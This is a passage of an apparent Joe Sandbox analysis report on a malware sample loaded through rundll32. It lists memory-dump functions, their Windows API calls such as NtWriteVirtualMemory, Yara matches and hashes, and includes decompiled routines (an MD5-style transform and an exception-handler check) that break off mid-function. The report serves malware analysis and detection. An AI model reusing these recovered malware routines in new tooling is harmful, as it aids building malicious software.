                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 1700061692-0
                                                          • Opcode ID: 2a4285ad39c80a1b935c81c045b54f9a0741484aa6b6dfcc5f7ff84fc4c22257
                                                          • Instruction ID: f2070e8bf2f6ed25fe8234f78acafd0b13f071f8180b687905331e87fc25af7d
                                                          • Opcode Fuzzy Hash: 2a4285ad39c80a1b935c81c045b54f9a0741484aa6b6dfcc5f7ff84fc4c22257
                                                          • Instruction Fuzzy Hash: 35F0A9713163516FE3916AA8AC8DE663759EFCA334B140235FE15D21C0D6A44C15CAB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627B7D5 Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0627B7E9
                                                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0627B829
                                                            • Part of subcall function 06285312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0628907F,?,00000004,00000000,00000004,?), ref: 06285330
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 0627B832
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                                          • String ID:
                                                          • API String ID: 4036914670-0
                                                          • Opcode ID: ceb724ed8f850be4303147a57e9c95c9e8856e48477951d3b0f7792c8fe3b9ff
                                                          • Instruction ID: c0b3eb7ab9d8a109a174f44556613b1ccf145a6b7937791298b834c3424e3dca
                                                          • Opcode Fuzzy Hash: ceb724ed8f850be4303147a57e9c95c9e8856e48477951d3b0f7792c8fe3b9ff
                                                          • Instruction Fuzzy Hash: B001F675A50209FFEB51AEA6EC09DEEBBBEEB88741F100025FE41E2050E775D904DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06283829 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0628385A
                                                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 06283891
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                          • String ID:
                                                          • API String ID: 2533303245-0
                                                          • Opcode ID: 18bed3406621ec41b7e2bd754a26c780c437445158a829254cba323cc6ee9952
                                                          • Instruction ID: c0d01014357f943ecac93f2f8f9bd7de780ad4b990ff4820b8e377feec1efc4f
                                                          • Opcode Fuzzy Hash: 18bed3406621ec41b7e2bd754a26c780c437445158a829254cba323cc6ee9952
                                                          • Instruction Fuzzy Hash: 7B016236D23225BFD7A2EA959C0CAAEB6699F85F91F164124AD05E3180E7708A01C6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062764C4 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 062764E3
                                                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 062764FB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuerymemset
                                                          • String ID:
                                                          • API String ID: 2040988606-0
                                                          • Opcode ID: 4e2c263c73d431ead2909f39a3bd348c1f40340a75d5b85615aa8ff4af548778
                                                          • Instruction ID: 6fece54f0a9275e4de6ad2064162c1aca914535192550efa2281841eca8d196d
                                                          • Opcode Fuzzy Hash: 4e2c263c73d431ead2909f39a3bd348c1f40340a75d5b85615aa8ff4af548778
                                                          • Instruction Fuzzy Hash: 42F04FB6900229AADB50EA90DC09FDEBBACDB04750F004060AE18E2081E774DA45CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285220 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0628524D
                                                          • SetLastError.KERNEL32(00000000,?,0627C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 06285254
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$LastStatus
                                                          • String ID:
                                                          • API String ID: 4076355890-0
                                                          • Opcode ID: 76ae33ebb7127395c0218c9bbd736406d4649d6127b844b4ae813a6a0943ea01
                                                          • Instruction ID: cc58c1de3cf3f48d1bca465f2be2147ac7ae97a7a41766f4f60ebb11b5927b68
                                                          • Opcode Fuzzy Hash: 76ae33ebb7127395c0218c9bbd736406d4649d6127b844b4ae813a6a0943ea01
                                                          • Instruction Fuzzy Hash: 63E0123261121AAFDF425EE8AC08D9E7B59EB4C751B008010BF15E2510CB36D421DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628FF4D Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 06290327
                                                          • memset.NTDLL ref: 06290336
                                                            • Part of subcall function 06278E0C: memset.NTDLL ref: 06278E1D
                                                            • Part of subcall function 06278E0C: memset.NTDLL ref: 06278E29
                                                            • Part of subcall function 06278E0C: memset.NTDLL ref: 06278E54
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                                                          • Instruction ID: 796b77a68a21de3ede889d76aa0448ad4ed524ff7a0a04ac14359865db5c2790
                                                          • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                                                          • Instruction Fuzzy Hash: FE022070921B258FCBB5CF29C680567B7F5BF95610B604E2EDAE786A90D231F481CB24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D4BF1 Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 49%
                                                          			E036D4BF1(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                                          0x036d4bf4
                                                          0x036d4bff
                                                          0x036d4c02
                                                          0x036d4c05
                                                          0x036d4c06
                                                          0x036d4c24
                                                          0x036d4c26
                                                          0x036d4c29
                                                          0x036d4c2c
                                                          0x036d4c2c
                                                          0x036d4c2f
                                                          0x036d4c2f
                                                          0x036d4c32
                                                          0x036d4c32
                                                          0x036d4c35
                                                          0x036d4c35
                                                          0x036d4c52
                                                          0x036d4c55
                                                          0x036d4c6b
                                                          0x036d4c6e
                                                          0x036d4c88
                                                          0x036d4c8b
                                                          0x036d4ca1
                                                          0x036d4ca4
                                                          0x036d4ca6
                                                          0x036d4cbe
                                                          0x036d4cc1
                                                          0x036d4cc4
                                                          0x036d4cdc
                                                          0x036d4cdf
                                                          0x036d4cf9
                                                          0x036d4cfc
                                                          0x036d4d12
                                                          0x036d4d15
                                                          0x036d4d17
                                                          0x036d4d2f
                                                          0x036d4d34
                                                          0x036d4d37
                                                          0x036d4d4d
                                                          0x036d4d50
                                                          0x036d4d6a
                                                          0x036d4d6d
                                                          0x036d4d83
                                                          0x036d4d86
                                                          0x036d4d88
                                                          0x036d4da3
                                                          0x036d4da6
                                                          0x036d4dbd
                                                          0x036d4dc0
                                                          0x036d4dc4
                                                          0x036d4ddd
                                                          0x036d4de0
                                                          0x036d4de2
                                                          0x036d4de5
                                                          0x036d4e00
                                                          0x036d4e03
                                                          0x036d4e1c
                                                          0x036d4e1f
                                                          0x036d4e2f
                                                          0x036d4e32
                                                          0x036d4e4a
                                                          0x036d4e4d
                                                          0x036d4e67
                                                          0x036d4e6a
                                                          0x036d4e82
                                                          0x036d4e85
                                                          0x036d4e9b
                                                          0x036d4e9e
                                                          0x036d4eb6
                                                          0x036d4eb9
                                                          0x036d4ed1
                                                          0x036d4ed4
                                                          0x036d4eee
                                                          0x036d4ef1
                                                          0x036d4f07
                                                          0x036d4f0a
                                                          0x036d4f22
                                                          0x036d4f25
                                                          0x036d4f3f
                                                          0x036d4f42
                                                          0x036d4f5a
                                                          0x036d4f5d
                                                          0x036d4f73
                                                          0x036d4f76
                                                          0x036d4f8e
                                                          0x036d4f91
                                                          0x036d4fa9
                                                          0x036d4fac
                                                          0x036d4fbe
                                                          0x036d4fc1
                                                          0x036d4fd3
                                                          0x036d4fd6
                                                          0x036d4fe8
                                                          0x036d4feb
                                                          0x036d4fef
                                                          0x036d4fff
                                                          0x036d5002
                                                          0x036d5010
                                                          0x036d5013
                                                          0x036d5025
                                                          0x036d5028
                                                          0x036d503c
                                                          0x036d503f
                                                          0x036d5041
                                                          0x036d5051
                                                          0x036d5054
                                                          0x036d5066
                                                          0x036d5069
                                                          0x036d5077
                                                          0x036d507a
                                                          0x036d508c
                                                          0x036d508f
                                                          0x036d5093
                                                          0x036d50a3
                                                          0x036d50a6
                                                          0x036d50b8
                                                          0x036d50bb
                                                          0x036d50c9
                                                          0x036d50cc
                                                          0x036d50de
                                                          0x036d50e1
                                                          0x036d50f3
                                                          0x036d50f6
                                                          0x036d510a
                                                          0x036d510d
                                                          0x036d5121
                                                          0x036d5124
                                                          0x036d5138
                                                          0x036d513b
                                                          0x036d514f
                                                          0x036d5152
                                                          0x036d5166
                                                          0x036d5169
                                                          0x036d517d
                                                          0x036d5182
                                                          0x036d5194
                                                          0x036d5197
                                                          0x036d51ab
                                                          0x036d51ae
                                                          0x036d51c2
                                                          0x036d51c5
                                                          0x036d51db
                                                          0x036d51de
                                                          0x036d51f2
                                                          0x036d51f5
                                                          0x036d5207
                                                          0x036d520a
                                                          0x036d521e
                                                          0x036d5221
                                                          0x036d5235
                                                          0x036d5238
                                                          0x036d524c
                                                          0x036d5255
                                                          0x036d5258
                                                          0x036d5261
                                                          0x036d526a
                                                          0x036d5272
                                                          0x036d527a
                                                          0x036d5284
                                                          0x036d5299

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                                          • Instruction ID: 6e3027263c2ec6bbf908a2c07e94c7039c45dd0ab064d0f991f72c4e0d9fc82a
                                                          • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                                          • Instruction Fuzzy Hash: 9922857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628154D Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                                                          • Instruction ID: 5f670582b5910bc9e0df30ae1249ddfabaf66fe8062cc37dc3cf4092564d890a
                                                          • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                                                          • Instruction Fuzzy Hash: 0822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062767CA Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 0b7e06ba7589124f1904bf3bd47fa6c4a2fa30603a670ddf315de8df0320b48e
                                                          • Instruction ID: ddc36d1d0b30fc324520b5dacd6e36d839ad4fee2c3b3a3019e47e0d731506f8
                                                          • Opcode Fuzzy Hash: 0b7e06ba7589124f1904bf3bd47fa6c4a2fa30603a670ddf315de8df0320b48e
                                                          • Instruction Fuzzy Hash: 8C42B030A20B56CFCB65CF69C480AAAFBF1FF49304F54856ED88B9B651D334A485CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D84C1 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D84C1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x36da380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x36da3c8 = 1;
										__eflags =  *0x36da3c8;
										if( *0x36da3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x36da380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
